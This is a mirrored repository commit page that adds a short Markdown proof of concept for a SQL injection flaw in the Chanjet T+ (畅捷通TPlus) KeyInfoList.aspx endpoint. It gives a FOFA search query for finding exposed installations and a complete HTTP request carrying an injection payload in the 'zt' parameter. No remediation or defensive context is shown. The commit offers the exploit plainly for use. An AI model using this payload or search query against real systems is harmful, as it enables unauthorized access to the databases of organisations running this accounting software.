admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞.md

Browse Source
This commit is contained in:
wy876 2024-04-10 21:50:41 +08:00 committed by GitHub
parent d99596d5a1
commit 03a551c247
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 16 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞.md Normal file
View File

@ -0,0 +1,16 @@
## 畅捷通TPlus-KeyInfoList.aspx存在SQL注入漏洞
## fofa
```
app="畅捷通-TPlus"
```
## poc
```
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','1')))--+ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
```